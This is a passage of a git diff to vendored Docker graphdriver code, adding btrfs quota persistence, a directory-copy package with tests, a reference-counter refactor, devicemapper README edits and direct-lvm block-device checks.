+	var args C.struct_btrfs_ioctl_search_args
+	args.key.tree_id = C.BTRFS_QUOTA_TREE_OBJECTID
+	args.key.min_type = C.BTRFS_QGROUP_STATUS_KEY
+	args.key.max_type = C.BTRFS_QGROUP_STATUS_KEY
+	args.key.max_objectid = C.__u64(math.MaxUint64)
+	args.key.max_offset = C.__u64(math.MaxUint64)
+	args.key.max_transid = C.__u64(math.MaxUint64)
+	args.key.nr_items = 4096
+
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_TREE_SEARCH,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to search qgroup for %s: %v", path, errno.Error())
+	}
+	sh := (*C.struct_btrfs_ioctl_search_header)(unsafe.Pointer(&args.buf))
+	if sh._type != C.BTRFS_QGROUP_STATUS_KEY {
+		return fmt.Errorf("Invalid qgroup search header type for %s: %v", path, sh._type)
+	}
+	return nil
+}
+
+func subvolLookupQgroup(path string) (uint64, error) {
+	dir, err := openDir(path)
+	if err != nil {
+		return 0, err
+	}
+	defer closeDir(dir)
+
+	var args C.struct_btrfs_ioctl_ino_lookup_args
+	args.objectid = C.BTRFS_FIRST_FREE_OBJECTID
+
+	_, _, errno := unix.Syscall(unix.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_INO_LOOKUP,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return 0, fmt.Errorf("Failed to lookup qgroup for %s: %v", dir, errno.Error())
+	}
+	if args.treeid == 0 {
+		return 0, fmt.Errorf("Invalid qgroup id for %s: 0", dir)
+	}
+
+	return uint64(args.treeid), nil
+}
+
 func (d *Driver) subvolumesDir() string {
 	return path.Join(d.home, "subvolumes")
 }
@@ -374,6 +480,14 @@ func (d *Driver) subvolumesDirID(id string) string {
 	return path.Join(d.subvolumesDir(), id)
 }
 
+func (d *Driver) quotasDir() string {
+	return path.Join(d.home, "quotas")
+}
+
+func (d *Driver) quotasDirID(id string) string {
+	return path.Join(d.quotasDir(), id)
+}
+
 // CreateReadWrite creates a layer that is writable for use as a container
 // file system.
 func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
@@ -382,12 +496,13 @@ func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts
 
 // Create the filesystem with given id.
 func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+	quotas := path.Join(d.home, "quotas")
 	subvolumes := path.Join(d.home, "subvolumes")
 	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
 	if err != nil {
 		return err
 	}
-	if err := idtools.MkdirAllAs(subvolumes, 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAllAndChown(subvolumes, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
 		return err
 	}
 	if parent == "" {
@@ -418,9 +533,16 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
 		if err := d.parseStorageOpt(storageOpt, driver); err != nil {
 			return err
 		}
+
 		if err := d.setStorageSize(path.Join(subvolumes, id), driver); err != nil {
 			return err
 		}
+		if err := idtools.MkdirAllAndChown(quotas, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
+			return err
+		}
+		if err := ioutil.WriteFile(path.Join(quotas, id), []byte(fmt.Sprint(driver.options.size)), 0644); err != nil {
+			return err
+		}
 	}
 
 	// if we have a remapped root (user namespaces enabled), change the created snapshot
@@ -467,19 +589,10 @@ func (d *Driver) setStorageSize(dir string, driver *Driver) error {
 	if d.options.minSpace > 0 && driver.options.size < d.options.minSpace {
 		return fmt.Errorf("btrfs: storage size cannot be less than %s", units.HumanSize(float64(d.options.minSpace)))
 	}
-
-	if !quotaEnabled {
-		if err := subvolEnableQuota(d.home); err != nil {
-			return err
-		}
-		quotaEnabled = true
-	}
-
-	if err := subvolLimitQgroup(dir, driver.options.size); err != nil {
+	if err := d.subvolEnableQuota(); err != nil {
 		return err
 	}
-
-	return nil
+	return subvolLimitQgroup(dir, driver.options.size)
 }
 
 // Remove the filesystem with given id.
@@ -488,31 +601,51 @@ func (d *Driver) Remove(id string) error {
 	if _, err := os.Stat(dir); err != nil {
 		return err
 	}
-	if err := subvolDelete(d.subvolumesDir(), id); err != nil {
+	quotasDir := d.quotasDirID(id)
+	if _, err := os.Stat(quotasDir); err == nil {
+		if err := os.Remove(quotasDir); err != nil {
+			return err
+		}
+	} else if !os.IsNotExist(err) {
 		return err
 	}
-	if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) {
+
+	// Call updateQuotaStatus() to invoke status update
+	d.updateQuotaStatus()
+
+	if err := subvolDelete(d.subvolumesDir(), id, d.quotaEnabled); err != nil {
 		return err
 	}
-	if err := subvolRescanQuota(d.home); err != nil {
+	if err := system.EnsureRemoveAll(dir); err != nil {
 		return err
 	}
-	return nil
+	return d.subvolRescanQuota()
 }
 
 // Get the requested filesystem id.
-func (d *Driver) Get(id, mountLabel string) (string, error) {
+func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) {
 	dir := d.subvolumesDirID(id)
 	st, err := os.Stat(dir)
 	if err != nil {
-		return "", err
+		return nil, err
 	}
 
 	if !st.IsDir() {
-		return "", fmt.Errorf("%s: not a directory", dir)
+		return nil, fmt.Errorf("%s: not a directory", dir)
 	}
 
-	return dir, nil
+	if quota, err := ioutil.ReadFile(d.quotasDirID(id)); err == nil {
+		if size, err := strconv.ParseUint(string(quota), 10, 64); err == nil && size >= d.options.minSpace {
+			if err := d.subvolEnableQuota(); err != nil {
+				return nil, err
+			}
+			if err := subvolLimitQgroup(dir, size); err != nil {
+				return nil, err
+			}
+		}
+	}
+
+	return containerfs.NewLocalContainerFS(dir), nil
 }
 
 // Put is not implemented for BTRFS as there is no cleanup required for the id.
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go
index 0038dbcdcd..b70e93bc2d 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package btrfs
+package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs"
 
 import (
 	"os"
@@ -35,12 +35,14 @@ func TestBtrfsSubvolDelete(t *testing.T) {
 	}
 	defer graphtest.PutDriver(t)
 
-	dir, err := d.Get("test", "")
+	dirFS, err := d.Get("test", "")
 	if err != nil {
 		t.Fatal(err)
 	}
 	defer d.Put("test")
 
+	dir := dirFS.Path()
+
 	if err := subvolCreate(dir, "subvoltest"); err != nil {
 		t.Fatal(err)
 	}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go
index f07088887a..d7793f8794 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go
@@ -1,3 +1,3 @@
 // +build !linux !cgo
 
-package btrfs
+package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs"
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go
index 73d90cdd71..2fb5c73555 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go
@@ -1,6 +1,6 @@
 // +build linux,!btrfs_noversion
 
-package btrfs
+package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs"
 
 /*
 #include <btrfs/version.h>
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go
index f802fbc629..5c755f8177 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go
@@ -1,6 +1,6 @@
 // +build linux,btrfs_noversion
 
-package btrfs
+package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs"
 
 // TODO(vbatts) remove this work-around once supported linux distros are on
 // btrfs utilities of >= 3.16.1
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go
index 15a6e75cb3..465daadb0d 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go
@@ -1,6 +1,6 @@
 // +build linux,!btrfs_noversion
 
-package btrfs
+package btrfs // import "github.com/docker/docker/daemon/graphdriver/btrfs"
 
 import (
 	"testing"
@@ -8,6 +8,6 @@ import (
 
 func TestLibVersion(t *testing.T) {
 	if btrfsLibVersion() <= 0 {
-		t.Errorf("expected output from btrfs lib version > 0")
+		t.Error("expected output from btrfs lib version > 0")
 	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go
new file mode 100644
index 0000000000..86316fdfe7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go
@@ -0,0 +1,277 @@
+// +build linux
+
+package copy // import "github.com/docker/docker/daemon/graphdriver/copy"
+
+/*
+#include <linux/fs.h>
+
+#ifndef FICLONE
+#define FICLONE		_IOW(0x94, 9, int)
+#endif
+*/
+import "C"
+import (
+	"container/list"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"syscall"
+	"time"
+
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/system"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+	"golang.org/x/sys/unix"
+)
+
+// Mode indicates whether to use hardlink or copy content
+type Mode int
+
+const (
+	// Content creates a new file, and copies the content of the file
+	Content Mode = iota
+	// Hardlink creates a new hardlink to the existing file
+	Hardlink
+)
+
+func copyRegular(srcPath, dstPath string, fileinfo os.FileInfo, copyWithFileRange, copyWithFileClone *bool) error {
+	srcFile, err := os.Open(srcPath)
+	if err != nil {
+		return err
+	}
+	defer srcFile.Close()
+
+	// If the destination file already exists, we shouldn't blow it away
+	dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE|os.O_EXCL, fileinfo.Mode())
+	if err != nil {
+		return err
+	}
+	defer dstFile.Close()
+
+	if *copyWithFileClone {
+		_, _, err = unix.Syscall(unix.SYS_IOCTL, dstFile.Fd(), C.FICLONE, srcFile.Fd())
+		if err == nil {
+			return nil
+		}
+
+		*copyWithFileClone = false
+		if err == unix.EXDEV {
+			*copyWithFileRange = false
+		}
+	}
+	if *copyWithFileRange {
+		err = doCopyWithFileRange(srcFile, dstFile, fileinfo)
+		// Trying the file_clone may not have caught the exdev case
+		// as the ioctl may not have been available (therefore EINVAL)
+		if err == unix.EXDEV || err == unix.ENOSYS {
+			*copyWithFileRange = false
+		} else {
+			return err
+		}
+	}
+	return legacyCopy(srcFile, dstFile)
+}
+
+func doCopyWithFileRange(srcFile, dstFile *os.File, fileinfo os.FileInfo) error {
+	amountLeftToCopy := fileinfo.Size()
+
+	for amountLeftToCopy > 0 {
+		n, err := unix.CopyFileRange(int(srcFile.Fd()), nil, int(dstFile.Fd()), nil, int(amountLeftToCopy), 0)
+		if err != nil {
+			return err
+		}
+
+		amountLeftToCopy = amountLeftToCopy - int64(n)
+	}
+
+	return nil
+}
+
+func legacyCopy(srcFile io.Reader, dstFile io.Writer) error {
+	_, err := pools.Copy(dstFile, srcFile)
+
+	return err
+}
+
+func copyXattr(srcPath, dstPath, attr string) error {
+	data, err := system.Lgetxattr(srcPath, attr)
+	if err != nil {
+		return err
+	}
+	if data != nil {
+		if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+type fileID struct {
+	dev uint64
+	ino uint64
+}
+
+type dirMtimeInfo struct {
+	dstPath *string
+	stat    *syscall.Stat_t
+}
+
+// DirCopy copies or hardlinks the contents of one directory to another,
+// properly handling xattrs, and soft links
+//
+// Copying xattrs can be opted out of by passing false for copyXattrs.
+func DirCopy(srcDir, dstDir string, copyMode Mode, copyXattrs bool) error {
+	copyWithFileRange := true
+	copyWithFileClone := true
+
+	// This is a map of source file inodes to dst file paths
+	copiedFiles := make(map[fileID]string)
+
+	dirsToSetMtimes := list.New()
+	err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+
+		// Rebase path
+		relPath, err := filepath.Rel(srcDir, srcPath)
+		if err != nil {
+			return err
+		}
+
+		dstPath := filepath.Join(dstDir, relPath)
+		if err != nil {
+			return err
+		}
+
+		stat, ok := f.Sys().(*syscall.Stat_t)
+		if !ok {
+			return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath)
+		}
+
+		isHardlink := false
+
+		switch f.Mode() & os.ModeType {
+		case 0: // Regular file
+			id := fileID{dev: stat.Dev, ino: stat.Ino}
+			if copyMode == Hardlink {
+				isHardlink = true
+				if err2 := os.Link(srcPath, dstPath); err2 != nil {
+					return err2
+				}
+			} else if hardLinkDstPath, ok := copiedFiles[id]; ok {
+				if err2 := os.Link(hardLinkDstPath, dstPath); err2 != nil {
+					return err2
+				}
+			} else {
+				if err2 := copyRegular(srcPath, dstPath, f, &copyWithFileRange, &copyWithFileClone); err2 != nil {
+					return err2
+				}
+				copiedFiles[id] = dstPath
+			}
+
+		case os.ModeDir:
+			if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) {
+				return err
+			}
+
+		case os.ModeSymlink:
+			link, err := os.Readlink(srcPath)
+			if err != nil {
+				return err
+			}
+
+			if err := os.Symlink(link, dstPath); err != nil {
+				return err
+			}
+
+		case os.ModeNamedPipe:
+			fallthrough
+		case os.ModeSocket:
+			if err := unix.Mkfifo(dstPath, stat.Mode); err != nil {
+				return err
+			}
+
+		case os.ModeDevice:
+			if rsystem.RunningInUserNS() {
+				// cannot create a device if running in user namespace
+				return nil
+			}
+			if err := unix.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil {
+				return err
+			}
+
+		default:
+			return fmt.Errorf("unknown file type for %s", srcPath)
+		}
+
+		// Everything below is copying metadata from src to dst. All this metadata
+		// already shares an inode for hardlinks.
+		if isHardlink {
+			return nil
+		}
+
+		if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil {
+			return err
+		}
+
+		if copyXattrs {
+			if err := doCopyXattrs(srcPath, dstPath); err != nil {
+				return err
+			}
+		}
+
+		isSymlink := f.Mode()&os.ModeSymlink != 0
+
+		// There is no LChmod, so ignore mode for symlink. Also, this
+		// must happen after chown, as that can modify the file mode
+		if !isSymlink {
+			if err := os.Chmod(dstPath, f.Mode()); err != nil {
+				return err
+			}
+		}
+
+		// system.Chtimes doesn't support a NOFOLLOW flag atm
+		// nolint: unconvert
+		if f.IsDir() {
+			dirsToSetMtimes.PushFront(&dirMtimeInfo{dstPath: &dstPath, stat: stat})
+		} else if !isSymlink {
+			aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
+			mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec))
+			if err := system.Chtimes(dstPath, aTime, mTime); err != nil {
+				return err
+			}
+		} else {
+			ts := []syscall.Timespec{stat.Atim, stat.Mtim}
+			if err := system.LUtimesNano(dstPath, ts); err != nil {
+				return err
+			}
+		}
+		return nil
+	})
+	if err != nil {
+		return err
+	}
+	for e := dirsToSetMtimes.Front(); e != nil; e = e.Next() {
+		mtimeInfo := e.Value.(*dirMtimeInfo)
+		ts := []syscall.Timespec{mtimeInfo.stat.Atim, mtimeInfo.stat.Mtim}
+		if err := system.LUtimesNano(*mtimeInfo.dstPath, ts); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func doCopyXattrs(srcPath, dstPath string) error {
+	if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil {
+		return err
+	}
+
+	// We need to copy this attribute if it appears in an overlay upper layer, as
+	// this function is used to copy those. It is set by overlay if a directory
+	// is removed and then re-created and should not inherit anything from the
+	// same dir in the lower dir.
+	return copyXattr(srcPath, dstPath, "trusted.overlay.opaque")
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go
new file mode 100644
index 0000000000..0f3b1670f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go
@@ -0,0 +1,159 @@
+// +build linux
+
+package copy // import "github.com/docker/docker/daemon/graphdriver/copy"
+
+import (
+	"fmt"
+	"io/ioutil"
+	"math/rand"
+	"os"
+	"path/filepath"
+	"syscall"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/system"
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestCopy(t *testing.T) {
+	copyWithFileRange := true
+	copyWithFileClone := true
+	doCopyTest(t, &copyWithFileRange, &copyWithFileClone)
+}
+
+func TestCopyWithoutRange(t *testing.T) {
+	copyWithFileRange := false
+	copyWithFileClone := false
+	doCopyTest(t, &copyWithFileRange, &copyWithFileClone)
+}
+
+func TestCopyDir(t *testing.T) {
+	srcDir, err := ioutil.TempDir("", "srcDir")
+	assert.NilError(t, err)
+	populateSrcDir(t, srcDir, 3)
+
+	dstDir, err := ioutil.TempDir("", "testdst")
+	assert.NilError(t, err)
+	defer os.RemoveAll(dstDir)
+
+	assert.Check(t, DirCopy(srcDir, dstDir, Content, false))
+	assert.NilError(t, filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+
+		// Rebase path
+		relPath, err := filepath.Rel(srcDir, srcPath)
+		assert.NilError(t, err)
+		if relPath == "." {
+			return nil
+		}
+
+		dstPath := filepath.Join(dstDir, relPath)
+		assert.NilError(t, err)
+
+		// If we add non-regular dirs and files to the test
+		// then we need to add more checks here.
+		dstFileInfo, err := os.Lstat(dstPath)
+		assert.NilError(t, err)
+
+		srcFileSys := f.Sys().(*syscall.Stat_t)
+		dstFileSys := dstFileInfo.Sys().(*syscall.Stat_t)
+
+		t.Log(relPath)
+		if srcFileSys.Dev == dstFileSys.Dev {
+			assert.Check(t, srcFileSys.Ino != dstFileSys.Ino)
+		}
+		// Todo: check size, and ctim is not equal
+		/// on filesystems that have granular ctimes
+		assert.Check(t, is.DeepEqual(srcFileSys.Mode, dstFileSys.Mode))
+		assert.Check(t, is.DeepEqual(srcFileSys.Uid, dstFileSys.Uid))
+		assert.Check(t, is.DeepEqual(srcFileSys.Gid, dstFileSys.Gid))
+		assert.Check(t, is.DeepEqual(srcFileSys.Mtim, dstFileSys.Mtim))
+
+		return nil
+	}))
+}
+
+func randomMode(baseMode int) os.FileMode {
+	for i := 0; i < 7; i++ {
+		baseMode = baseMode | (1&rand.Intn(2))<<uint(i)
+	}
+	return os.FileMode(baseMode)
+}
+
+func populateSrcDir(t *testing.T, srcDir string, remainingDepth int) {
+	if remainingDepth == 0 {
+		return
+	}
+	aTime := time.Unix(rand.Int63(), 0)
+	mTime := time.Unix(rand.Int63(), 0)
+
+	for i := 0; i < 10; i++ {
+		dirName := filepath.Join(srcDir, fmt.Sprintf("srcdir-%d", i))
+		// Owner all bits set
+		assert.NilError(t, os.Mkdir(dirName, randomMode(0700)))
+		populateSrcDir(t, dirName, remainingDepth-1)
+		assert.NilError(t, system.Chtimes(dirName, aTime, mTime))
+	}
+
+	for i := 0; i < 10; i++ {
+		fileName := filepath.Join(srcDir, fmt.Sprintf("srcfile-%d", i))
+		// Owner read bit set
+		assert.NilError(t, ioutil.WriteFile(fileName, []byte{}, randomMode(0400)))
+		assert.NilError(t, system.Chtimes(fileName, aTime, mTime))
+	}
+}
+
+func doCopyTest(t *testing.T, copyWithFileRange, copyWithFileClone *bool) {
+	dir, err := ioutil.TempDir("", "docker-copy-check")
+	assert.NilError(t, err)
+	defer os.RemoveAll(dir)
+	srcFilename := filepath.Join(dir, "srcFilename")
+	dstFilename := filepath.Join(dir, "dstilename")
+
+	r := rand.New(rand.NewSource(0))
+	buf := make([]byte, 1024)
+	_, err = r.Read(buf)
+	assert.NilError(t, err)
+	assert.NilError(t, ioutil.WriteFile(srcFilename, buf, 0777))
+	fileinfo, err := os.Stat(srcFilename)
+	assert.NilError(t, err)
+
+	assert.NilError(t, copyRegular(srcFilename, dstFilename, fileinfo, copyWithFileRange, copyWithFileClone))
+	readBuf, err := ioutil.ReadFile(dstFilename)
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(buf, readBuf))
+}
+
+func TestCopyHardlink(t *testing.T) {
+	var srcFile1FileInfo, srcFile2FileInfo, dstFile1FileInfo, dstFile2FileInfo unix.Stat_t
+
+	srcDir, err := ioutil.TempDir("", "srcDir")
+	assert.NilError(t, err)
+	defer os.RemoveAll(srcDir)
+
+	dstDir, err := ioutil.TempDir("", "dstDir")
+	assert.NilError(t, err)
+	defer os.RemoveAll(dstDir)
+
+	srcFile1 := filepath.Join(srcDir, "file1")
+	srcFile2 := filepath.Join(srcDir, "file2")
+	dstFile1 := filepath.Join(dstDir, "file1")
+	dstFile2 := filepath.Join(dstDir, "file2")
+	assert.NilError(t, ioutil.WriteFile(srcFile1, []byte{}, 0777))
+	assert.NilError(t, os.Link(srcFile1, srcFile2))
+
+	assert.Check(t, DirCopy(srcDir, dstDir, Content, false))
+
+	assert.NilError(t, unix.Stat(srcFile1, &srcFile1FileInfo))
+	assert.NilError(t, unix.Stat(srcFile2, &srcFile2FileInfo))
+	assert.Equal(t, srcFile1FileInfo.Ino, srcFile2FileInfo.Ino)
+
+	assert.NilError(t, unix.Stat(dstFile1, &dstFile1FileInfo))
+	assert.NilError(t, unix.Stat(dstFile2, &dstFile2FileInfo))
+	assert.Check(t, is.Equal(dstFile1FileInfo.Ino, dstFile2FileInfo.Ino))
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/counter.go b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go
index 5ea604f5b6..2772bd247d 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/counter.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go
@@ -1,4 +1,4 @@
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 import "sync"
 
@@ -22,30 +22,21 @@ func NewRefCounter(c Checker) *RefCounter {
 	}
 }
 
-// Increment increaes the ref count for the given id and returns the current count
+// Increment increases the ref count for the given id and returns the current count
 func (c *RefCounter) Increment(path string) int {
-	c.mu.Lock()
-	m := c.counts[path]
-	if m == nil {
-		m = &minfo{}
-		c.counts[path] = m
-	}
-	// if we are checking this path for the first time check to make sure
-	// if it was already mounted on the system and make sure we have a correct ref
-	// count if it is mounted as it is in use.
-	if !m.check {
-		m.check = true
-		if c.checker.IsMounted(path) {
-			m.count++
-		}
-	}
-	m.count++
-	c.mu.Unlock()
-	return m.count
+	return c.incdec(path, func(minfo *minfo) {
+		minfo.count++
+	})
 }
 
 // Decrement decreases the ref count for the given id and returns the current count
 func (c *RefCounter) Decrement(path string) int {
+	return c.incdec(path, func(minfo *minfo) {
+		minfo.count--
+	})
+}
+
+func (c *RefCounter) incdec(path string, infoOp func(minfo *minfo)) int {
 	c.mu.Lock()
 	m := c.counts[path]
 	if m == nil {
@@ -61,7 +52,11 @@ func (c *RefCounter) Decrement(path string) int {
 			m.count++
 		}
 	}
-	m.count--
+	infoOp(m)
+	count := m.count
+	if count <= 0 {
+		delete(c.counts, path)
+	}
 	c.mu.Unlock()
-	return m.count
+	return count
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md
index b23bbb107a..6594fa65f0 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md
@@ -1,11 +1,13 @@
-## devicemapper - a storage backend based on Device Mapper
+# devicemapper - a storage backend based on Device Mapper
 
-### Theory of operation
+## Theory of operation
 
 The device mapper graphdriver uses the device mapper thin provisioning
 module (dm-thinp) to implement CoW snapshots. The preferred model is
 to have a thin pool reserved outside of Docker and passed to the
-daemon via the `--storage-opt dm.thinpooldev` option.
+daemon via the `--storage-opt dm.thinpooldev` option. Alternatively,
+the device mapper graphdriver can setup a block device to handle this
+for you via the `--storage-opt dm.directlvm_device` option.
 
 As a fallback if no thin pool is provided, loopback files will be
 created.  Loopback is very slow, but can be used without any
@@ -39,7 +41,7 @@ containers. All base images are snapshots of this device and those
 images are then in turn used as snapshots for other images and
 eventually containers.
 
-### Information on `docker info`
+## Information on `docker info`
 
 As of docker-1.4.1, `docker info` when using the `devicemapper` storage driver
 will display something like:
@@ -64,7 +66,7 @@ will display something like:
 	 Library Version: 1.02.82-git (2013-10-04)
 	[...]
 
-#### status items
+### status items
 
 Each item in the indented section under `Storage Driver: devicemapper` are
 status information about the driver.
@@ -84,11 +86,11 @@ status information about the driver.
  *  `Metadata loop file` file attached to `Metadata file`, if loopback device is used
  *  `Library Version` from the libdevmapper used
 
-### About the devicemapper options
+## About the devicemapper options
 
 The devicemapper backend supports some options that you can specify
 when starting the docker daemon using the `--storage-opt` flags.
-This uses the `dm` prefix and would be used something like `docker daemon --storage-opt dm.foo=bar`.
+This uses the `dm` prefix and would be used something like `dockerd --storage-opt dm.foo=bar`.
 
 These options are currently documented both in [the man
 page](../../../man/docker.1.md) and in [the online
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/device_setup.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/device_setup.go
new file mode 100644
index 0000000000..4d7f35c406
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/device_setup.go
@@ -0,0 +1,231 @@
+package devmapper // import "github.com/docker/docker/daemon/graphdriver/devmapper"
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"reflect"
+	"strings"
+
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+type directLVMConfig struct {
+	Device              string
+	ThinpPercent        uint64
+	ThinpMetaPercent    uint64
+	AutoExtendPercent   uint64
+	AutoExtendThreshold uint64
+}
+
+var (
+	errThinpPercentMissing = errors.New("must set both `dm.thinp_percent` and `dm.thinp_metapercent` if either is specified")
+	errThinpPercentTooBig  = errors.New("combined `dm.thinp_percent` and `dm.thinp_metapercent` must not be greater than 100")
+	errMissingSetupDevice  = errors.New("must provide device path in `dm.setup_device` in order to configure direct-lvm")
+)
+
+func validateLVMConfig(cfg directLVMConfig) error {
+	if reflect.DeepEqual(cfg, directLVMConfig{}) {
+		return nil
+	}
+	if cfg.Device == "" {
+		return errMissingSetupDevice
+	}
+	if (cfg.ThinpPercent > 0 && cfg.ThinpMetaPercent == 0) || cfg.ThinpMetaPercent > 0 && cfg.ThinpPercent == 0 {
+		return errThinpPercentMissing
+	}
+
+	if cfg.ThinpPercent+cfg.ThinpMetaPercent > 100 {
+		return errThinpPercentTooBig
+	}
+	return nil
+}
+
+func checkDevAvailable(dev string) error {
+	lvmScan, err := exec.LookPath("lvmdiskscan")
+	if err != nil {
+		logrus.Debug("could not find lvmdiskscan")
+		return nil
+	}
+
+	out, err := exec.Command(lvmScan).CombinedOutput()
+	if err != nil {
+		logrus.WithError(err).Error(string(out))
+		return nil
+	}
+
+	if !bytes.Contains(out, []byte(dev)) {
+		return errors.Errorf("%s is not available for use with devicemapper", dev)
+	}
+	return nil
+}
+
+func checkDevInVG(dev string) error {
+	pvDisplay, err := exec.LookPath("pvdisplay")
+	if err != nil {
+		logrus.Debug("could not find pvdisplay")
+		return nil
+	}
+
+	out, err := exec.Command(pvDisplay, dev).CombinedOutput()
+	if err != nil {
+		logrus.WithError(err).Error(string(out))
+		return nil
+	}
+
+	scanner := bufio.NewScanner(bytes.NewReader(bytes.TrimSpace(out)))
+	for scanner.Scan() {
+		fields := strings.SplitAfter(strings.TrimSpace(scanner.Text()), "VG Name")
+		if len(fields) > 1 {
+			// got "VG Name" line"
+			vg := strings.TrimSpace(fields[1])
+			if len(vg) > 0 {
+				return errors.Errorf("%s is already part of a volume group %q: must remove this device from any volume group or provide a different device", dev, vg)
+			}
+			logrus.Error(fields)
+			break
+		}
+	}
+	return nil
+}
+
+func checkDevHasFS(dev string) error {
+	blkid, err := exec.LookPath("blkid")
+	if err != nil {
+		logrus.Debug("could not find blkid")
+		return nil
+	}
+
+	out, err := exec.Command(blkid, dev).CombinedOutput()
+	if err != nil {
+		logrus.WithError(err).Error(string(out))
+		return nil
+	}
+
+	fields := bytes.Fields(out)
+	for _, f := range fields {
+		kv := bytes.Split(f, []byte{'='})
+		if bytes.Equal(kv[0], []byte("TYPE")) {
+			v := bytes.Trim(kv[1], "\"")
+			if len(v) > 0 {
+				return errors.Errorf("%s has a filesystem already, use dm.directlvm_device_force=true if you want to wipe the device", dev)
+			}
+			return nil
+		}
+	}
+	return nil
+}
+
+func verifyBlockDevice(dev string, force bool) error {
+	if err := checkDevAvailable(dev); err != nil {
+		return err
+	}
+	if err := checkDevInVG(dev); err != nil {
+		return err
+	}
+	if force {
+		return nil
+	}
+	return checkDevHasFS(dev)
+}
+
